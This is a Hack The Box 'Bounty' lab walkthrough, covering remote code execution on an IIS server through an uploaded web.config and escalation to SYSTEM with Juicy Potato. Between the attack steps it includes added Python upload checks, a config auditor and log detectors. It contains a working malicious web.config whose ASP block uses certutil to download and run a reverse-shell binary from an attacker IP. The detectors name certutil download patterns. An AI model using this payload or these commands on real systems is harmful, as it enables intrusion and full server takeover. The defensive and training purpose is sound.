Hack The Box – Bounty Walkthrough
Introduction
This was an easy Windows machine that involved uploading a web.config file to a Windows ASP web server to gain remote code execution, then abusing token impersonation to escalate privileges to SYSTEM.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:
- -sC to run default scripts
- -sV to enumerate application versions
The scan identified only port 80 as open, so the next logical step is to enumerate HTTP.
Enumerating HTTP
When accessing the web server on port 80 through a browser, the following page comes up:
The above isn't very helpful unfortunately, so the next step is to run a scan for hidden files and directories using Gobuster, with the following flags:
- dir to specify the scan should be done against directories and files
- -u to specify the target URL
- -w to specify the word list to use
- -x to specify the extensions to enumerate
The scan identified a transfer.aspx entry; visiting it leads to a file upload page:
After trying a few common executable extensions such as asp and aspx without success, I decided to use Burp Intruder instead to identify which extensions are allowed. Intercepting the file upload request:
Sending the request to Intruder:
Selecting the file extension as the only payload position to replace:
Modifying the raft-small-extensions.txt wordlist from SecLists by removing the leading dot, to prevent Burp from URL-encoding it:
In the Payloads tab, selecting "Runtime file" as the payload type and choosing the wordlist:
It appears that one of the allowed extensions is config:
In Windows ASP, web.config files let you customize the way your site, or a page on it, behaves. These files may also allow arbitrary ASP code to run in the context of the web application. This article explains in depth how web.config files can be exploited.
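The Intruder run above shows why the upload page was exploitable: it rejected asp and aspx by name but never listed config, which is the usual failure of a blocklist. The following added example (not code from the box or the walkthrough) compares a hypothetical blocklist of the kind the upload page appears to use against an allowlist for an image-upload feature, judging the same filenames with both. The extension sets and the reserved IIS filenames are assumptions for the demonstration.

```python
"""Blocklist vs allowlist extension checks for a file-upload handler.

Added example, not part of the Bounty box or this walkthrough. The lists
below are hypothetical policies chosen to illustrate the failure mode.
"""
import os

# Hypothetical blocklist of the kind the vulnerable upload page appears to use:
# it names the obvious script extensions and nothing else.
BLOCKED_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".exe"}

# Allowlist for a hypothetical image-upload feature: only these may be stored.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Filenames IIS treats specially regardless of any extension handling.
RESERVED_NAMES = {"web.config", "global.asax"}


def normalise(filename: str) -> str:
    """Drop any directory component and lower-case the name, so that
    'WEB.CONFIG' or '..\\web.config' are judged on the base name only."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return base.strip().lower()


def blocklist_allows(filename: str) -> bool:
    """The weak check: accept unless the final extension is on the blocklist."""
    _, ext = os.path.splitext(normalise(filename))
    return ext not in BLOCKED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """The stronger check: the base name must not be reserved, must carry
    exactly one extension, and that extension must be on the allowlist."""
    name = normalise(filename)
    if name in RESERVED_NAMES:
        return False
    parts = name.split(".")
    # Reject names with no extension or more than one dot
    # (e.g. 'image.jpg.aspx'), which double-extension tricks rely on.
    if len(parts) != 2 or not parts[0]:
        return False
    return "." + parts[1] in ALLOWED_EXTENSIONS


def compare(filenames):
    """Return {filename: (blocklist_result, allowlist_result)} for review."""
    return {f: (blocklist_allows(f), allowlist_allows(f)) for f in filenames}


if __name__ == "__main__":
    # Constructed sample filenames, including the one that worked on the box.
    samples = ["photo.png", "shell.aspx", "web.config", "WEB.CONFIG", "image.jpg.aspx"]
    for name, (weak, strong) in compare(samples).items():
        verdict = lambda ok: "accept" if ok else "reject"
        print(f"{name:16} blocklist={verdict(weak):7} allowlist={verdict(strong)}")
```

The blocklist accepts web.config because ".config" is simply not in its set; the allowlist rejects it twice over, first as a reserved name and then because ".config" is not an image extension. Validating the content type of the stored bytes and writing uploads outside the web root are the usual companions to this check.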
Exploiting Web.config to gain RCE
The first step is to generate some shellcode using MSFvenom with the following flags:
- -p to specify the payload type, in this case, the Windows TCP reverse shell
- LHOST to specify the localhost IP address to connect to
- LPORT to specify the local port to connect to
- -f to specify the format for the shell, in this case, exe
Creating the following web.config file, which will run the Certutil utility to download the reverse shell generated above and then execute it:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!--
<%
' The ASP engine still processes this block even though it sits inside an XML comment.
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.10.14.3/exploit.exe C:\users\public\exploit.exe && C:\users\public\exploit.exe")
' Read the command output so the response shows what happened.
output1 = cmd1.StdOut.ReadAll()
Response.write(output1)
%>
-->
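From the defender's side, the uploaded file above is easy to recognise: it adds a handler that routes *.config to asp.dll with Write access, removes the .config entry from request filtering, unhides web.config, and carries an ASP script block that no legitimate configuration file needs. The following added audit script (not from the walkthrough) parses a web.config and reports each of those signs. Both sample configurations are constructed for the demonstration; the script block in the first is cut down to the delimiter and the object creation, and the real file on the box would carry the download command shown above.

```python
"""Audit a web.config for the handler/request-filtering/inline-script pattern.

Added example, not code from the Bounty box or this walkthrough.
"""
import re
import xml.etree.ElementTree as ET

# Inline ASP delimiters; a real web.config never needs these, and the ASP
# engine executes them even inside an XML comment.
ASP_BLOCK = re.compile(r"<%.*?%>", re.DOTALL)


def audit_web_config(text: str) -> list:
    """Return human-readable findings for one web.config; [] means clean."""
    findings = []
    # 1. Script tags anywhere in the raw text, comments included.
    if ASP_BLOCK.search(text):
        findings.append("inline ASP script block (<% ... %>) present")

    root = ET.fromstring(text.strip())
    server = root.find("system.webServer")
    if server is None:
        return findings

    # 2. Handler mappings that route .config to a script engine, and
    #    handler access policies that include Write.
    handlers = server.find("handlers")
    if handlers is not None:
        policy = handlers.get("accessPolicy", "").lower()
        for add in handlers.findall("add"):
            name = add.get("name", "?")
            path = add.get("path", "").lower()
            proc = add.get("scriptProcessor", "").lower()
            if path.endswith(".config") or proc.endswith("asp.dll"):
                findings.append(f"handler '{name}' maps {path} to {proc}")
            if "write" in policy or add.get("requireAccess", "").lower() == "write":
                findings.append(f"handler '{name}' grants Write access")

    # 3. Request-filtering entries that strip the protections IIS ships with.
    rf = server.find("security/requestFiltering")
    if rf is not None:
        for rm in rf.findall("fileExtensions/remove"):
            findings.append(f"unblocks extension {rm.get('fileExtension')}")
        for rm in rf.findall("hiddenSegments/remove"):
            findings.append(f"exposes hidden segment '{rm.get('segment')}'")
    return findings


# Constructed sample in the shape of the file uploaded on the box, with the
# script block reduced to its first statement.
UPLOADED = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<%
Set wShell1 = CreateObject("WScript.Shell")
%>
-->"""

# Constructed benign sample: keeps .config blocked and changes nothing else.
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <fileExtensions>
          <add fileExtension=".config" allowed="false" />
        </fileExtensions>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>"""


if __name__ == "__main__":
    for label, cfg in (("uploaded", UPLOADED), ("benign", BENIGN)):
        print(label, audit_web_config(cfg) or "clean")
```

Running the script over every web.config found under an upload directory, or over the bytes of any upload whose name ends in .config before it is written to disk, turns this pattern into a cheap pre-storage check.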
Uploading the web.config file:
Setting up a Python web server to host the reverse shell:
The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
Navigating to the web.config file:
The reverse shell was successfully downloaded:
A callback was received on the listener, granting a reverse shell:
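The chain above leaves a clear trace in process-creation telemetry: the IIS worker process (w3wp.exe) spawning a script host or certutil, and certutil invoked with -urlcache and -f against a URL. The following added detection (not part of the walkthrough) scans constructed process-creation records for both signals. The tab-separated record layout and the sample lines are assumptions made for the demonstration, and the download host in them is a placeholder.

```python
"""Flag web-worker-spawned shells and certutil downloads in process logs.

Added example, not code from the Bounty box or this walkthrough.
"""
import re

WEB_WORKERS = {"w3wp.exe"}  # IIS worker process
CHILDREN_OF_INTEREST = {"cmd.exe", "cscript.exe", "wscript.exe", "powershell.exe", "certutil.exe"}

# certutil used as a downloader: -urlcache together with -f and a URL.
CERTUTIL_DOWNLOAD = re.compile(
    r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\b.*https?://", re.IGNORECASE
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(parent: str, image: str, cmdline: str) -> list:
    """Return the detection tags that apply to one process-creation record."""
    tags = []
    if basename(parent) in WEB_WORKERS and basename(image) in CHILDREN_OF_INTEREST:
        tags.append("web-worker-spawned-shell")
    if CERTUTIL_DOWNLOAD.search(cmdline):
        tags.append("certutil-download")
    return tags


def scan(lines) -> list:
    """Parse 'ParentImage<TAB>Image<TAB>CommandLine' records (assumed layout)
    and return (record_number, tags) for every record that raises a tag."""
    hits = []
    for number, line in enumerate(lines, 1):
        if not line.strip():
            continue
        parent, image, cmdline = line.rstrip("\n").split("\t", 2)
        tags = classify(parent, image, cmdline)
        if tags:
            hits.append((number, tags))
    return hits


# Constructed sample records: one matching the chain on the box, two benign,
# one shell spawned by the worker, one certutil download from a normal shell.
SAMPLE_LOG = [
    "\t".join([r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\certutil.exe",
               r"certutil -urlcache -split -f http://ATTACKER-PLACEHOLDER/exploit.exe C:\users\public\exploit.exe"]),
    "\t".join([r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
               r"notepad.exe report.txt"]),
    "\t".join([r"C:\Windows\System32\services.exe", r"C:\Windows\System32\certutil.exe",
               r"certutil -verify cert.cer"]),
    "\t".join([r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cscript.exe",
               r"cscript //nologo task.vbs"]),
    "\t".join([r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
               r"certutil.exe -urlcache -f http://intranet.example/tool.exe tool.exe"]),
]


if __name__ == "__main__":
    for number, tags in scan(SAMPLE_LOG):
        print(f"record {number}: {', '.join(tags)}")
```

The first rule is the higher-fidelity one: an IIS worker process has very few legitimate reasons to launch cmd, a script host or certutil, so it is worth alerting on regardless of the command line. The certutil rule catches the same LOLBin download technique when it runs from any other parent.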
Privilege Escalation
When running "whoami /priv" on the box, it appears the current user has SeImpersonatePrivilege, which means token impersonation could be abused to escalate privileges:
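The "whoami /priv" check is the standard triage step for this escalation path, on both sides of the engagement. The following added helper (not from the walkthrough) parses the command's output and reports the privileges that are known to enable escalation, with SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege at the top of the list. The sample output is constructed in the shape of an IIS application-pool token; the privilege list and descriptions are assumptions of this example.

```python
"""Parse 'whoami /priv' output and flag escalation-relevant privileges.

Added example, not code from the Bounty box or this walkthrough.
"""

# Privileges that commonly lead from a service account to SYSTEM. A 'Disabled'
# state only means the privilege is not currently enabled in the token; the
# holder can enable it, so it is reported either way.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate tokens (Potato-family escalation)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}


def parse_whoami_priv(text: str) -> dict:
    """Return {privilege_name: state} from the table printed by 'whoami /priv'.
    Rows start after the '=====' separator; the name is the first token and
    the state (Enabled/Disabled) the last, so the description may contain spaces."""
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        if len(parts) >= 2:
            privs[parts[0]] = parts[-1]
    return privs


def flag_high_risk(text: str) -> list:
    """Return (name, state, why) for every high-risk privilege in the token."""
    privs = parse_whoami_priv(text)
    return [(name, state, HIGH_RISK[name]) for name, state in privs.items() if name in HIGH_RISK]


# Constructed sample in the shape of an IIS application-pool token.
SAMPLE_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


if __name__ == "__main__":
    for name, state, why in flag_high_risk(SAMPLE_OUTPUT):
        print(f"{name:32} {state:9} {why}")
```

For an IIS deployment the finding is expected rather than surprising, since application-pool identities hold SeImpersonatePrivilege by default; the practical mitigations are keeping the host patched against the known token-abuse techniques and, above all, preventing the web application from running commands in the first place.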
Using Wget to download the Juicy Potato binary:
Using Certutil and the Python web server to transfer it to the victim machine:
A valid CLSID is required for the exploit to work, so the systeminfo command is used to check the operating system version:
A number of CLSIDs are available for Windows Server 2008 R2 on the Juicy Potato GitHub repository:
The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
Executing Juicy Potato using the following flags:
- -l to specify the COM server listen port
- -p to specify the program to launch, in this case, the previously created reverse shell
- -t to specify the CreateProcess call to use, in this case both CreateProcessWithToken and CreateProcessAsUser
- -c to specify the CLSID, in this case, the one found in GitHub for Windows Server 2008 R2
The exploit successfully executed the reverse shell as SYSTEM, granting a privileged shell.
Conclusion
This box was really different from the usual asp/aspx/ashx web shell upload, as it involved quite a bit of research to find out about web.config files and how to exploit them. I definitely learned something new doing this challenge, and I am sure most of the other users who completed it did too.